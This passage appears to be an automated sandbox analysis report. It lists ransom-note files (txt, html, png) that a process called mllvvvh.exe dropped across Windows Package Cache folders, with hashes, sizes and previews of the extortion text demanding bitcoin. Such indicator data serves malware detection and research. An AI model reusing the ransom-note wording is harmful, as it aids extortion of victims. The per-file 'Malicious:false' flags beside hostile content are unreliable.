                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):23568
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVSnz5mBbxfVS+
                  MD5:8F60B2BE8A4438EE8D39634A2905DC90
                  SHA1:1BA968D9CE47959C1634F49B4FE85F96377BBBFC
                  SHA-256:251A7614BEFB60C179B3DBAEA2D5A8C454F77F6F67B4BA4EC372DFD95413F74E
                  SHA-512:87AEAF08385F850D0561AE9C8C580D98410513083D57EAE28AF7F807CC3BAF718140666C1FD5BDBF26896B840409C1152ED3503EE737D35B53B2B3B883218A24
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):203256
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifA
                  MD5:A0143349A76CA69BC0467BCFFDC4BA4E
                  SHA1:DA0C90C0F2C225391C04591E8D6C4D2630F88BAA
                  SHA-256:E40842249D6491396D58DFF79A3D7B227BD4C34577EDBA14971C8093C54DF7A1
                  SHA-512:592FB6549C310D8E70C59448CCAD2F09AAF847BB400B9B9A9CA99EB25F0C9B28BD08AEE11C72E385BF70AA68C01DA10C8E274F4DCFA61D7359F1D8506095ABE5
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6291
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj6p1Itk5yj66
                  MD5:72CDE44EAF8B062B25F59E95D129AB77
                  SHA1:11BE3442666570EA99922AE78A1C5107D215CAF3
                  SHA-256:32275F9EDC074D4F75451F1F654768466592317C1ADBB4C4170E0BA0AE07B96A
                  SHA-512:A254638E22565F502D11FD5D31F777D4C2EA7F97CE79C7CC54CA45DB285D94D6FCB8ED04B42023BFCA5BCA3806BE9F6EC26861BBF23EC3A4829792974C92414C
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Package Cache\{19F7E289-17B8-44EC-A099-927507B6F739}v14.21.27702\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
